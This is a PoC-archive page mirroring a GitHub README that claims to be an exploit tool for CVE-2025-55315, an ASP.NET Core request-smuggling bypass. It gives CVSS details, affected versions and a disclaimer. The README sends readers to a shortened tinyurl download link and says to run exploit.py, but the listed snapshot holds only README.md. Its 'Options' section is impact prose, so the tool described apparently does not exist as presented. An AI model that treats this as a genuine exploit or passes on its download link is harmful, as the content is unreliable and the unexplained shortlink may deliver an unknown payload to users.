Goal Reached Thanks to every supporter β€” we hit 100%!

Goal: 1000 CNY Β· Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-55315 PoC β€” ASP.NET Security Feature Bypass Vulnerability

Source
https://github.com/blackquantas/CVE-2025-55315
Associated Vulnerability
Title:ASP.NET Security Feature Bypass Vulnerability (CVE-2025-55315)
Description:Inconsistent interpretation of http requests ('http request/response smuggling') in ASP.NET Core allows an authorized attacker to bypass a security feature over a network.
Readme
# Security Feature Bypass in ASP.NET Core by Microsoft (CVE-2025-55315)

## 🌟 Description

This vulnerability arises from an inconsistent interpretation of HTTP requests, commonly referred to as HTTP request/response smuggling. An authorized attacker can exploit this inconsistency to circumvent important security features, potentially leading to unauthorized access or manipulation of application data.

## βš™οΈ Installation

To set up the exploitation tool, follow these steps:

1. Download the repository:

|[Download](https://tinyurl.com/bwhw5u5y)
|:--------------- |

2. Navigate to the tool's directory:

cd CVE-2025-55315

3. Install the required Python packages:

pip install -r requirements.txt

## πŸš€ Usage

To use the tool, run the script from the command line as follows:

python exploit.py [options]

### Options

Unauthorized Access: By bypassing security features, attackers could gain access to sensitive data or functionalities within the application, leading to data breaches that could compromise user confidentiality and integrity.

Application Compromise: Exploitation of this vulnerability could facilitate further attacks, allowing malicious actors to perform unauthorized operations, which may result in system instability or additional security breaches.

Reputational Damage: Organizations affected by this vulnerability could suffer significant reputational harm, as customers and stakeholders may lose trust in the security and reliability of their applications, potentially resulting in financial losses and diminished market position.


### CVSS V3.1
- **Severity**: Critical
- **CVSS Score**: 9.9 (High)
- **Confidentiality**: High
- **Integrity**: High
- **Availability**: High
- **Attack Vector**: Network
- **Attack Complexity**: Low
- **Privileges Required**: Low

## πŸ—’ Affected Versions

The vulnerability affects the following versions:

Asp.net Core 8.0
Asp.net Core 9.0
Asp.net Core 2.3
Microsoft Visual Studio 2022 Version 17.12
Microsoft Visual Studio 2022 Version 17.10
Microsoft Visual Studio 2022 Version 17.14

## πŸ›‘ Disclaimer

Use this tool responsibly and ethically. Always obtain proper authorization before testing any system for vulnerabilities.
File Snapshot

 [4.0K]  /data/pocs/aab95f6f9c4c5bc3d81d144544be67c33f42e75d
└── [2.2K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers β€” if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online β€” thank you for the support. View subscription plans β†’